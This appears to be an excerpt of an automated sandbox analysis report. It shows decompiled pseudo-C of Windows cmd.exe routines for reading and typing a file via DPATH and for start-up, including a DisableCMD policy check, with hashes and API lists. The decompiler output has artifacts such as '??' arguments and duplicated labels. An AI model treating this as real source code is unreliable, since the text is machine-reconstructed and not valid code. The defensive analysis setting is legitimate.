                                    • API ID: Console$HeapMode_get_osfhandle$AddressAllocCriticalProcProcessSection$CommandEnvironmentLineStrings$CtrlEnterFreeHandleHandlerInfoInitializeLeaveModuleOutputTitlememcpy
                                    • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                    • API String ID: 1984466592-3021193919
                                    • Opcode ID: 1a02c7b1793679fccdff8a988619d566d4f715dfb039c36e752b51f12e581ea7
                                    • Instruction ID: 646eff5731a0c69d76884a43f1222fa307c814a17551d9d95fe4b3ba8e390533
                                    • Opcode Fuzzy Hash: 1a02c7b1793679fccdff8a988619d566d4f715dfb039c36e752b51f12e581ea7
                                    • Instruction Fuzzy Hash: 2BA1A231A50701ABDF2DEBE9B81DAAA3BF6FBA4704B04415DE506C7188DF70D981CB52
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F65A0, Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 430fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 52%
                                    			E011F65A0(WCHAR* __edx, WCHAR* _a4, long _a8, WCHAR* _a12, long _a16, signed int _a20, int _a24, short* _a28, void* _a32, signed int _a36, signed int _a40, WCHAR* _a44, WCHAR* _a48, void* _a52, long _a56, char _a60, intOrPtr _a68, void _a72, void* _a592, char _a596, long _a600, void _a608, void _a610, short _a1128, signed int _a4204) {
				void* _v0;
				intOrPtr _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t137;
				WCHAR* _t150;
				void* _t155;
				long _t157;
				WCHAR* _t160;
				signed int _t161;
				WCHAR* _t164;
				void* _t172;
				long _t174;
				WCHAR* _t175;
				signed int _t176;
				WCHAR* _t178;
				long _t181;
				WCHAR* _t182;
				WCHAR* _t183;
				WCHAR* _t184;
				void* _t190;
				long _t192;
				WCHAR* _t195;
				int _t197;
				void* _t198;
				WCHAR* _t199;
				void* _t202;
				WCHAR* _t206;
				long _t208;
				void* _t212;
				void* _t213;
				void* _t222;
				unsigned int _t226;
				WCHAR* _t228;
				void* _t232;
				unsigned int _t234;
				void* _t235;
				long _t245;
				int _t246;
				WCHAR* _t251;
				WCHAR* _t252;
				signed char* _t254;
				intOrPtr _t257;
				WCHAR* _t258;
				union _LARGE_INTEGER _t263;
				void* _t264;
				void* _t266;
				void* _t267;
				int _t268;
				WCHAR* _t269;
				signed int _t270;
				signed int _t273;
				signed int _t274;
				signed int _t275;

				_t253 = __edx;
				_t274 = _t273 & 0xfffffff8;
				E011E8290(0x1074);
				_t137 =  *0x11fd0b4; // 0x2833377e
				_a4204 = _t137 ^ _t274;
				_a56 = _a56 | 0xffffffff;
				_t262 = _a4;
				_a600 = 0x104;
				_a48 = _a4;
				_t266 = 0;
				_a52 = 0;
				_t212 = 1;
				_a20 = 0;
				_a60 = 0x7fffffff;
				_a32 = 0;
				_a36 = 0;
				_a40 = 1;
				_a592 = 0;
				_a596 = 1;
				memset( &_a72, 0, 0x104);
				_t275 = _t274 + 0xc;
				if(E011E0C70( &_a72, ((0 | _a596 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) >= 0) {
					_t253 = 0;
					_t263 = E011DD120(_t262, 0,  &_a72);
					__eflags = _t263 - 0xffffffff;
					if(_t263 != 0xffffffff) {
						L13:
						_a28 =  &_a608;
						_t150 = E011E0178( &_a608);
						__eflags = _t150;
						if(_t150 == 0) {
							_t202 =  &_a60;
							__imp___get_osfhandle(_t202);
							_a56 = GetFileSize(_t202, _t263);
							__imp___get_osfhandle(0);
							SetFilePointer(0, _t263, 0, 0);
							_t30 =  &_a36;
							 *_t30 = _a36 & _t266;
							__eflags =  *_t30;
							_a32 = _t212;
						}
						while(1) {
							L15:
							__eflags =  *0x11fd544;
							if( *0x11fd544 != 0) {
								break;
							}
							_t155 =  &_a608;
							__imp___get_osfhandle(_t155, 0x200,  &_a4, 0);
							_t222 = _t263;
							_t156 = ReadFile(_t155, ??, ??, ??, ??);
							__eflags = _t156;
							if(_t156 == 0) {
								L81:
								_t157 = GetLastError();
								_push(0);
								_push(_t157);
								 *0x1213cf0 = _t157;
								E011DC5A2(_t222);
								L82:
								E011DDB92(_t263);
								_t212 = 0;
								goto L87;
							}
							_t226 = _a4;
							__eflags = _t226;
							if(_t226 == 0) {
								goto L82;
							}
							__eflags = _a40;
							if(_a40 == 0) {
								L21:
								_a24 = _t226;
								__eflags = _t266;
								if(_t266 == 0) {
									L25:
									_t160 = E011E269C(_t156);
									__eflags = _t160;
									if(_t160 != 0) {
										L28:
										_t268 = _a4;
										_t254 =  &_a608;
										_t228 = _t268;
										__eflags = _t268;
										while(1) {
											_a12 = _t228;
											if(__eflags == 0) {
												break;
											}
											_t161 =  *_t254 & 0x000000ff;
											__eflags =  *((char*)(_t161 + 0x1217f30));
											if( *((char*)(_t161 + 0x1217f30)) == 0) {
												L31:
												_t254 =  &(_t254[1]);
												_t228 = _t228 - 1;
												__eflags = _t228;
												continue;
											}
											_t253 =  &(_t254[1]);
											_t228 = _t228 - 1;
											__eflags = _t228;
											_a12 = _t228;
											if(_t228 == 0) {
												_t198 =  &_a12;
												__imp___get_osfhandle(_t253, _t212, _t198, 0);
												_t222 = _t263;
												_t199 = ReadFile(_t198, ??, ??, ??, ??);
												__eflags = _t199;
												if(_t199 == 0) {
													goto L81;
												}
												_t268 =  &(_a4[0]);
												__eflags = _t268;
												_a4 = _t268;
												_a24 = _t268;
												L36:
												_a28 = _a28 & 0x00000000;
												_t253 =  &_a608;
												_t164 = E011F6CEF(_t212,  &_a608,  &_a24,  &_a28);
												__eflags = _t164;
												if(_t164 != 0) {
													L39:
													_t269 = MultiByteToWideChar( *0x1203854, 0,  &_a608, _t268,  &_a1128, 0x400);
													_a12 = _t269;
													__eflags = _t269;
													if(_t269 == 0) {
														_t269 = 0x400;
														_a12 = 0x400;
													}
													_t226 = _a4;
													_a28 =  &_a1128;
													L42:
													__eflags = _a40;
													if(_a40 != 0) {
														__eflags =  *0x1213cd0;
														if( *0x1213cd0 != 0) {
															E011DC5A2(_t226, 0x2354, _t212, _a48);
															_t226 = _a4;
															_t275 = _t275 + 0xc;
															_t269 = _a12;
														}
														_t75 =  &_a40;
														 *_t75 = _a40 & 0x00000000;
														__eflags =  *_t75;
													}
													_v0 = _a28;
													__eflags = _t269;
													if(_t269 <= 0) {
														L74:
														_t270 = _a32;
														_t253 = _a36;
														__eflags = _t270 | _t253;
														if((_t270 | _t253) != 0) {
															_t172 =  &_a32;
															__imp___get_osfhandle(_t172, _t212);
															SetFilePointerEx(_t172, _t263, 0, 0);
															_t253 = _a36;
															_t270 = _a32;
															_t226 = _a4;
														}
														__eflags = _t226 - _a24;
														if(_t226 != _a24) {
															goto L82;
														} else {
															__eflags = _a60 - _t253;
															if(__eflags < 0) {
																goto L82;
															}
															if(__eflags > 0) {
																L80:
																_t266 = _a20;
																goto L15;
															}
															__eflags = _a56 - _t270;
															if(_a56 <= _t270) {
																goto L82;
															}
															goto L80;
														}
													} else {
														do {
															_t174 = 0x50;
															__eflags = _t269 - _t174;
															if(_t269 <= _t174) {
																_a8 = _t269;
																__eflags = _t269;
																if(_t269 == 0) {
																	break;
																}
																L50:
																__eflags =  *0x11fd544;
																if( *0x11fd544 != 0) {
																	goto L86;
																}
																_t175 = E011E269C(_t174);
																__eflags = _t175;
																if(_t175 == 0) {
																	__eflags =  *0x121805c;
																	if( *0x121805c != 0) {
																		__eflags = _a20;
																		if(_a20 == 0) {
																			_t176 = _a8;
																			_t232 = _v0;
																			L62:
																			_a68 = _t176 + _t176;
																			_t178 = E011E27C8(_t176 + _t176, _t232, _t176 + _t176,  &_a16);
																			__eflags = _a12;
																			_t257 = _v8;
																			_a36 = _t178;
																			if(_a12 != 0) {
																				 *((short*)(_a68 + _t257)) = _a52;
																			}
																			_t234 = _a16;
																			_t269 = _t269 - (_t234 >> 1);
																			_t181 = _a8;
																			_t258 = _t257 + _t234;
																			__eflags = _t258;
																			_v0 = _t258;
																			L65:
																			_t253 = _a44;
																			L66:
																			__eflags = _t253;
																			if(_t253 == 0) {
																				L68:
																				_t182 = GetLastError();
																				 *0x1213cf0 = _t182;
																				__eflags = _t182;
																				if(_t182 == 0) {
																					 *0x1213cf0 = 0x70;
																				}
																				_t235 = _t212;
																				_t183 = E011E0178(_t182);
																				__eflags = _t183;
																				if(_t183 == 0) {
																					_t236 = _t212;
																					_t184 = E011F9953(_t183, _t212);
																					__eflags = _t184;
																					if(_t184 == 0) {
																						E011F985A( *0x1213cf0);
																					} else {
																						_push(0);
																						_push(0x2364);
																						E011DC5A2(_t236);
																					}
																					goto L86;
																				} else {
																					_push(0);
																					_push(0x1d);
																					E011DC5A2(_t235);
																					goto L72;
																				}
																			}
																			__eflags = _t234 - _t181 + _t181;
																			if(_t234 == _t181 + _t181) {
																				goto L72;
																			}
																			goto L68;
																		}
																		L60:
																		_t176 = _a8;
																		_t232 = _v0;
																		_a52 =  *(_t232 + _t176 * 2) & 0x0000ffff;
																		 *(_t232 + _t176 * 2) = 0;
																		goto L62;
																	}
																	__eflags = _a20;
																	if(_a20 != 0) {
																		goto L60;
																	}
																	_t190 = _a8;
																	L58:
																	__imp___get_osfhandle(0);
																	_t253 = WriteFile(_t190, _t212, _v0, _t190,  &_a16);
																	_t192 = _a16;
																	_t269 = _t269 - _t192;
																	_v0 = _v0 + _t192;
																	_t234 = _t192 + _t192;
																	_t181 = _a8;
																	_a16 = _t234;
																	goto L66;
																}
																_t195 = WriteConsoleW(GetStdHandle(0xfffffff5), _v0, _a8,  &_a16, 0);
																_a44 = _t195;
																__eflags = _t195;
																_t190 = _a8;
																if(_t195 == 0) {
																	goto L58;
																}
																_t245 = _a16;
																__eflags = _t245 - _t190;
																if(_t245 != _t190) {
																	goto L58;
																}
																_t269 = _t269 - _t245;
																_t234 = _t245 + _t245;
																_v0 = _v0 + _t234;
																_a16 = _t234;
																goto L65;
															}
															_a8 = _t174;
															goto L50;
															L72:
															__eflags = _t269;
														} while (_t269 > 0);
														_t226 = _a4;
														goto L74;
													}
												}
												_t197 = _a24;
												__eflags = _t197;
												if(_t197 == 0) {
													goto L82;
												}
												_t268 = _t197;
												goto L39;
											}
											goto L31;
										}
										goto L36;
									}
									__eflags =  *0x121805c - _t160;
									if( *0x121805c != _t160) {
										goto L28;
									}
									_t226 = _a4;
									_t269 = _t226;
									L23:
									_a12 = _t269;
									goto L42;
								}
								_t269 = _t226 >> 1;
								__eflags = _t269;
								goto L23;
							}
							_t156 = 0xfeff;
							__eflags = _a608 - 0xfeff;
							if(_a608 != 0xfeff) {
								_t45 =  &_a20;
								 *_t45 = _a20 & 0x00000000;
								__eflags =  *_t45;
								_a24 = _t226;
								goto L25;
							}
							_t246 = _t226 - 2;
							__eflags = _t246;
							_a4 = _t246;
							_t266 = _t212;
							_a20 = _t266;
							_t156 = memmove( &_a608,  &_a610, _t246);
							_t226 = _a4;
							_t275 = _t275 + 0xc;
							goto L21;
						}
						L86:
						E011DDB92(_t263);
						goto L87;
					}
					_t206 = E011E3320(L"DPATH");
					__eflags = _t206;
					if(_t206 == 0) {
						L11:
						_t250 =  *0x1213cf0;
						__eflags =  *0x1213cf0 - 0x7b;
						if( *0x1213cf0 == 0x7b) {
							_t250 = 2;
							 *0x1213cf0 = _t250;
						}
						goto L2;
					}
					_t251 = _a592;
					__eflags = _t251;
					if(_t251 == 0) {
						_t251 =  &_a72;
					}
					_t208 = SearchPathW(_t206, _a48, 0, _a600, _t251, 0);
					__eflags = _t208;
					if(_t208 == 0) {
						goto L11;
					}
					_t252 = _a592;
					__eflags = _t252;
					if(_t252 == 0) {
						_t252 =  &_a72;
					}
					_t253 = 0;
					_t263 = E011DD120(_t252, 0, _t252);
					__eflags = _t263 - 0xffffffff;
					if(_t263 != 0xffffffff) {
						goto L13;
					} else {
						goto L11;
					}
				} else {
					_t250 = 8;
					L2:
					E011F985A(_t250);
					L87:
					__imp__??_V@YAXPAX@Z(_a592);
					_pop(_t264);
					_pop(_t267);
					_pop(_t213);
					return E011E6FD0(_t212, _t213, _a4204 ^ _t275, _t253, _t264, _t267);
				}
			}


























































                                    0x011f65a0
                                    0x011f65a5
                                    0x011f65ad
                                    0x011f65b2
                                    0x011f65b9
                                    0x011f65c0
                                    0x011f65ca
                                    0x011f65d3
                                    0x011f65e1
                                    0x011f65e5
                                    0x011f65e7
                                    0x011f65eb
                                    0x011f65ec
                                    0x011f65f1
                                    0x011f65f9
                                    0x011f65fd
                                    0x011f6601
                                    0x011f6605
                                    0x011f660c
                                    0x011f6613
                                    0x011f661e
                                    0x011f663e
                                    0x011f664e
                                    0x011f6657
                                    0x011f6659
                                    0x011f665c
                                    0x011f66cd
                                    0x011f66d6
                                    0x011f66da
                                    0x011f66df
                                    0x011f66e1
                                    0x011f66e3
                                    0x011f66e9
                                    0x011f66f7
                                    0x011f6701
                                    0x011f6709
                                    0x011f670f
                                    0x011f670f
                                    0x011f670f
                                    0x011f6713
                                    0x011f6713
                                    0x011f6717
                                    0x011f6717
                                    0x011f6717
                                    0x011f671e
                                    0x00000000
                                    0x00000000
                                    0x011f6730
                                    0x011f6739
                                    0x011f673f
                                    0x011f6741
                                    0x011f6747
                                    0x011f6749
                                    0x011f6aad
                                    0x011f6aad
                                    0x011f6ab3
                                    0x011f6ab5
                                    0x011f6ab6
                                    0x011f6abb
                                    0x011f6ac2
                                    0x011f6ac4
                                    0x011f6ac9
                                    0x00000000
                                    0x011f6ac9
                                    0x011f674f
                                    0x011f6753
                                    0x011f6755
                                    0x00000000
                                    0x00000000
                                    0x011f675b
                                    0x011f6760
                                    0x011f679c
                                    0x011f679c
                                    0x011f67a0
                                    0x011f67a2
                                    0x011f67ba
                                    0x011f67bc
                                    0x011f67c1
                                    0x011f67c3
                                    0x011f67d5
                                    0x011f67d5
                                    0x011f67d9
                                    0x011f67e0
                                    0x011f67e2
                                    0x011f6800
                                    0x011f6800
                                    0x011f6804
                                    0x00000000
                                    0x00000000
                                    0x011f67e6
                                    0x011f67e9
                                    0x011f67f0
                                    0x011f67fc
                                    0x011f67fc
                                    0x011f67fd
                                    0x011f67fd
                                    0x00000000
                                    0x011f67fd
                                    0x011f67f2
                                    0x011f67f3
                                    0x011f67f3
                                    0x011f67f6
                                    0x011f67fa
                                    0x011f680a
                                    0x011f6812
                                    0x011f6818
                                    0x011f681a
                                    0x011f6820
                                    0x011f6822
                                    0x00000000
                                    0x00000000
                                    0x011f682c
                                    0x011f682c
                                    0x011f682d
                                    0x011f6831
                                    0x011f6835
                                    0x011f6835
                                    0x011f6846
                                    0x011f684d
                                    0x011f6852
                                    0x011f6854
                                    0x011f6864
                                    0x011f6888
                                    0x011f688a
                                    0x011f688e
                                    0x011f6890
                                    0x011f6892
                                    0x011f6897
                                    0x011f6897
                                    0x011f689b
                                    0x011f68a6
                                    0x011f68aa
                                    0x011f68aa
                                    0x011f68af
                                    0x011f68b1
                                    0x011f68b8
                                    0x011f68c4
                                    0x011f68c9
                                    0x011f68cd
                                    0x011f68d0
                                    0x011f68d0
                                    0x011f68d4
                                    0x011f68d4
                                    0x011f68d4
                                    0x011f68d4
                                    0x011f68dd
                                    0x011f68e1
                                    0x011f68e3
                                    0x011f6a5d
                                    0x011f6a5d
                                    0x011f6a63
                                    0x011f6a67
                                    0x011f6a69
                                    0x011f6a6c
                                    0x011f6a76
                                    0x011f6a7e
                                    0x011f6a84
                                    0x011f6a88
                                    0x011f6a8c
                                    0x011f6a8c
                                    0x011f6a90
                                    0x011f6a94
                                    0x00000000
                                    0x011f6a96
                                    0x011f6a96
                                    0x011f6a9a
                                    0x00000000
                                    0x00000000
                                    0x011f6a9c
                                    0x011f6aa4
                                    0x011f6aa4
                                    0x00000000
                                    0x011f6aa4
                                    0x011f6a9e
                                    0x011f6aa2
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011f6aa2
                                    0x011f68e9
                                    0x011f68e9
                                    0x011f68eb
                                    0x011f68ec
                                    0x011f68ee
                                    0x011f68f6
                                    0x011f68fa
                                    0x011f68fc
                                    0x00000000
                                    0x00000000
                                    0x011f6902
                                    0x011f6902
                                    0x011f6909
                                    0x00000000
                                    0x00000000
                                    0x011f6911
                                    0x011f6916
                                    0x011f6918
                                    0x011f695d
                                    0x011f6964
                                    0x011f69a5
                                    0x011f69aa
                                    0x011f69c4
                                    0x011f69c8
                                    0x011f69cc
                                    0x011f69d5
                                    0x011f69dc
                                    0x011f69e1
                                    0x011f69e6
                                    0x011f69ea
                                    0x011f69ee
                                    0x011f69f8
                                    0x011f69f8
                                    0x011f69fc
                                    0x011f6a04
                                    0x011f6a06
                                    0x011f6a0a
                                    0x011f6a0a
                                    0x011f6a0c
                                    0x011f6a10
                                    0x011f6a10
                                    0x011f6a14
                                    0x011f6a14
                                    0x011f6a16
                                    0x011f6a1e
                                    0x011f6a1e
                                    0x011f6a24
                                    0x011f6a29
                                    0x011f6a2b
                                    0x011f6a2d
                                    0x011f6a2d
                                    0x011f6a37
                                    0x011f6a39
                                    0x011f6a3e
                                    0x011f6a40
                                    0x011f6acd
                                    0x011f6acf
                                    0x011f6ad4
                                    0x011f6ad6
                                    0x011f6aee
                                    0x011f6ad8
                                    0x011f6ad8
                                    0x011f6ada
                                    0x011f6adf
                                    0x011f6ae5
                                    0x00000000
                                    0x011f6a46
                                    0x011f6a46
                                    0x011f6a48
                                    0x011f6a4a
                                    0x00000000
                                    0x011f6a50
                                    0x011f6a40
                                    0x011f6a1a
                                    0x011f6a1c
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011f6a1c
                                    0x011f69ac
                                    0x011f69ac
                                    0x011f69b0
                                    0x011f69b8
                                    0x011f69be
                                    0x00000000
                                    0x011f69be
                                    0x011f6966
                                    0x011f696b
                                    0x00000000
                                    0x00000000
                                    0x011f696d
                                    0x011f6971
                                    0x011f697e
                                    0x011f698c
                                    0x011f698e
                                    0x011f6992
                                    0x011f6994
                                    0x011f6998
                                    0x011f699b
                                    0x011f699f
                                    0x00000000
                                    0x011f699f
                                    0x011f6932
                                    0x011f6938
                                    0x011f693c
                                    0x011f693e
                                    0x011f6942
                                    0x00000000
                                    0x00000000
                                    0x011f6944
                                    0x011f6948
                                    0x011f694a
                                    0x00000000
                                    0x00000000
                                    0x011f694c
                                    0x011f694e
                                    0x011f6950
                                    0x011f6954
                                    0x00000000
                                    0x011f6954
                                    0x011f68f0
                                    0x00000000
                                    0x011f6a51
                                    0x011f6a51
                                    0x011f6a51
                                    0x011f6a59
                                    0x00000000
                                    0x011f6a59
                                    0x011f68e3
                                    0x011f6856
                                    0x011f685a
                                    0x011f685c
                                    0x00000000
                                    0x00000000
                                    0x011f6862
                                    0x00000000
                                    0x011f6862
                                    0x00000000
                                    0x011f67fa
                                    0x00000000
                                    0x011f6806
                                    0x011f67c5
                                    0x011f67cb
                                    0x00000000
                                    0x00000000
                                    0x011f67cd
                                    0x011f67d1
                                    0x011f67a8
                                    0x011f67a8
                                    0x00000000
                                    0x011f67a8
                                    0x011f67a6
                                    0x011f67a6
                                    0x00000000
                                    0x011f67a6
                                    0x011f6762
                                    0x011f6767
                                    0x011f676f
                                    0x011f67b1
                                    0x011f67b1
                                    0x011f67b1
                                    0x011f67b6
                                    0x00000000
                                    0x011f67b6
                                    0x011f6771
                                    0x011f6771
                                    0x011f6784
                                    0x011f6788
                                    0x011f678b
                                    0x011f678f
                                    0x011f6795
                                    0x011f6799
                                    0x00000000
                                    0x011f6799
                                    0x011f6af3
                                    0x011f6af5
                                    0x00000000
                                    0x011f6af5
                                    0x011f6663
                                    0x011f6668
                                    0x011f666a
                                    0x011f66b4
                                    0x011f66b4
                                    0x011f66ba
                                    0x011f66bd
                                    0x011f66c1
                                    0x011f66c2
                                    0x011f66c2
                                    0x00000000
                                    0x011f66bd
                                    0x011f666c
                                    0x011f6673
                                    0x011f6675
                                    0x011f6677
                                    0x011f6677
                                    0x011f668c
                                    0x011f6692
                                    0x011f6694
                                    0x00000000
                                    0x00000000
                                    0x011f6696
                                    0x011f669d
                                    0x011f669f
                                    0x011f66a1
                                    0x011f66a1
                                    0x011f66a6
                                    0x011f66ad
                                    0x011f66af
                                    0x011f66b2
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011f6640
                                    0x011f6642
                                    0x011f6643
                                    0x011f6643
                                    0x011f6afa
                                    0x011f6b01
                                    0x011f6b11
                                    0x011f6b12
                                    0x011f6b13
                                    0x011f6b1e
                                    0x011f6b1e

                                    APIs
                                    • memset.MSVCRT ref: 011F6613
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • SearchPathW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,?,00000000,?,?,00000000,?,-00000105), ref: 011F668C
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011F6B01
                                      • Part of subcall function 011E0178: _get_osfhandle.MSVCRT ref: 011E0183
                                      • Part of subcall function 011E0178: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011ED6A1), ref: 011E018D
                                    • _get_osfhandle.MSVCRT ref: 011F66E9
                                    • GetFileSize.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000105), ref: 011F66F1
                                    • _get_osfhandle.MSVCRT ref: 011F6701
                                    • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 011F6709
                                      • Part of subcall function 011E269C: _get_osfhandle.MSVCRT ref: 011E26A7
                                      • Part of subcall function 011E269C: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011DC5F8,?,?,?), ref: 011E26B6
                                      • Part of subcall function 011E269C: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,?,?,011DC5C6), ref: 011E26D2
                                      • Part of subcall function 011E269C: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,00000002), ref: 011E26E1
                                      • Part of subcall function 011E269C: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011E26EC
                                      • Part of subcall function 011E269C: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,011DC5C6), ref: 011E26F5
                                    • _get_osfhandle.MSVCRT ref: 011F6739
                                    • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000105), ref: 011F6741
                                    • memmove.MSVCRT ref: 011F678F
                                    • _get_osfhandle.MSVCRT ref: 011F6812
                                    • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 011F681A
                                    • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(00000000,?,?,?,00000400,00000000,00000000), ref: 011F6882
                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,?,?,00000000), ref: 011F692B
                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011F6932
                                    • _get_osfhandle.MSVCRT ref: 011F697E
                                    • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 011F6986
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?), ref: 011F6A1E
                                    • _get_osfhandle.MSVCRT ref: 011F6A76
                                    • SetFilePointerEx.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 011F6A7E
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011F6AAD
                                      • Part of subcall function 011F9953: _get_osfhandle.MSVCRT ref: 011F9956
                                      • Part of subcall function 011F9953: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 011F995E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: File_get_osfhandle$Type$ConsoleErrorHandleLastLockPointerReadSharedWritememset$AcquireByteCharModeMultiPathReleaseSearchSizeWidememmove
                                    • String ID: DPATH
                                    • API String ID: 1247154890-2010427443
                                    • Opcode ID: 1d0f6e0e6f47bf7cf1a632663d13191709d094bbcbd0298914dc1264654f4730
                                    • Instruction ID: 13f2b848f647374717876c164d168e2c41af6bb4fe1aa5d519398cf27b700200
                                    • Opcode Fuzzy Hash: 1d0f6e0e6f47bf7cf1a632663d13191709d094bbcbd0298914dc1264654f4730
                                    • Instruction Fuzzy Hash: F8F1B271608342DFDB28DF29D848B6BBBE4FB98714F044A2DF68597284EB70D844CB52
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E44FC, Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 242registrythreadmemoryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 69%
                                    			E011E44FC() {
				signed int _v8;
				char _v24;
				int* _v28;
				char _v29;
				char _v36;
				void* _v40;
				int* _v44;
				int _v48;
				int _v52;
				signed int _t26;
				void* _t39;
				intOrPtr _t44;
				intOrPtr _t48;
				intOrPtr _t51;
				int _t53;
				intOrPtr _t55;
				int _t59;
				int _t64;
				void* _t73;
				void* _t75;
				intOrPtr _t82;
				void* _t84;
				void* _t95;
				char* _t96;
				signed int _t97;
				signed int _t98;

				_t26 =  *0x11fd0b4; // 0x2833377e
				_v8 = _t26 ^ _t98;
				_v44 = 0;
				 *0x120b938 = OpenThread(0x1fffff, 0, GetCurrentThreadId());
				E011E465D(_t75);
				__imp__HeapSetInformation(0, 1, 0, 0, _t95, _t97, _t73);
				_v36 = 0;
				if(RegOpenKeyExW(0x80000001, L"Software\\Policies\\Microsoft\\Windows\\System", 0, 0x20019,  &_v40) == 0) {
					_v48 = 4;
					RegQueryValueExW(_v40, L"DisableCMD", 0,  &_v52,  &_v36,  &_v48);
					RegCloseKey(_v40);
				}
				 *0x11fd614 = 1;
				_t93 = 0x11fd600;
				 *0x11fd610 =  &_v29;
				_t39 = E011E4719(0x11fd600);
				asm("sbb al, al");
				 *0x11fd614 =  *0x11fd614 &  ~(_t39 - 1);
				E011E46D8();
				_v28 = 0;
				_t96 =  &_v24;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t44 = E011E3D27(0,  &_v24);
				if(_v36 == 1) {
					_push(0);
					_push(0x40002729);
					E011DC108( &_v24);
					E011F3BB0(__eflags, 0);
					do {
						__eflags = E011E4B60(__eflags, 0);
					} while (__eflags == 0);
					_push(0xff);
					goto L13;
				} else {
					_t96 = 0xff;
					if(_t44 == 0) {
						L29:
						_push(0);
						L011E82C1();
						_v28 = _t44;
						_t84 = 0x120b8b8;
						_t97 = 2;
						__eflags = _t44;
						if(_t44 == 0) {
							L33:
							__eflags = _v36 - _t97;
							if(_v36 != _t97) {
								_t55 = E011E0178(_t44);
								__eflags = _t55;
								if(_t55 == 0) {
									_t97 = 3;
									__imp___setmode(0x8000);
									0 = 0;
								}
								E011DB2B0(0, 0);
								while(1) {
									L40:
									 *0x11fd590 = 0;
									EnterCriticalSection( *0x1203858);
									 *0x11fd544 = 0;
									LeaveCriticalSection( *0x1203858);
									_t93 = 0;
									_t86 = _t97;
									_t96 = E011DEEF0(_t97, 0, 0);
									__eflags = _t96 - 1;
									if(_t96 == 1) {
										continue;
									}
									L41:
									__eflags = _t96 - 0xffffffff;
									if(__eflags == 0) {
										do {
											__eflags = E011E4B60(__eflags, 0);
										} while (__eflags == 0);
										L25:
										_push(0);
										L13:
										exit();
										L14:
										_t48 = E011DEEF0(1, _t93,  *0x1213cd8);
										if(_t48 == 1) {
											do {
												__eflags = E011E4B60(__eflags, 0);
											} while (__eflags == 0);
											_push(1);
											goto L13;
										}
										if(_t48 == 0xffffffff) {
											do {
												__eflags = E011E4B60(__eflags, 0);
											} while (__eflags == 0);
											goto L25;
										}
										_t93 = _t48;
										_t51 = E011E0E00(0, _t48);
										if(_t51 != 0) {
											_v28 = _t51;
										}
										L8:
										_t97 = _t97 + 1;
										if(_t97 < 3) {
											L7:
											_t93 =  *((intOrPtr*)(_t98 + _t97 * 4 - 0x14));
											if( *((intOrPtr*)(_t98 + _t97 * 4 - 0x14)) != 0) {
												goto L14;
											}
											goto L8;
										}
										E011E06C0(0);
										_t53 = GetConsoleOutputCP();
										 *0x1203854 = _t53;
										GetCPInfo(_t53, 0x1203840);
										_t44 = E011E465D(0);
										_t82 =  *0x1213ccc;
										L10:
										_t106 = _t82;
										if(_t82 == 0) {
											 *0x1218058 = 0;
											goto L29;
										} else {
											goto L11;
										}
										do {
											L11:
										} while (E011E4B60(_t106, 0) == 0);
										_push(_v28);
										goto L13;
									}
									EnterCriticalSection( *0x1203858);
									 *0x11fd544 = 0;
									LeaveCriticalSection( *0x1203858);
									_t59 = GetConsoleOutputCP();
									 *0x1203854 = _t59;
									GetCPInfo(_t59, 0x1203840);
									E011E465D(_t86);
									E011E0E00(0, _t96);
									 *0x11fd59c = 0;
									E011E06C0(0);
									_t64 = GetConsoleOutputCP();
									 *0x1203854 = _t64;
									GetCPInfo(_t64, 0x1203840);
									E011E465D(0);
									do {
										goto L40;
									} while (_t96 == 1);
									goto L41;
									L40:
									 *0x11fd590 = 0;
									EnterCriticalSection( *0x1203858);
									 *0x11fd544 = 0;
									LeaveCriticalSection( *0x1203858);
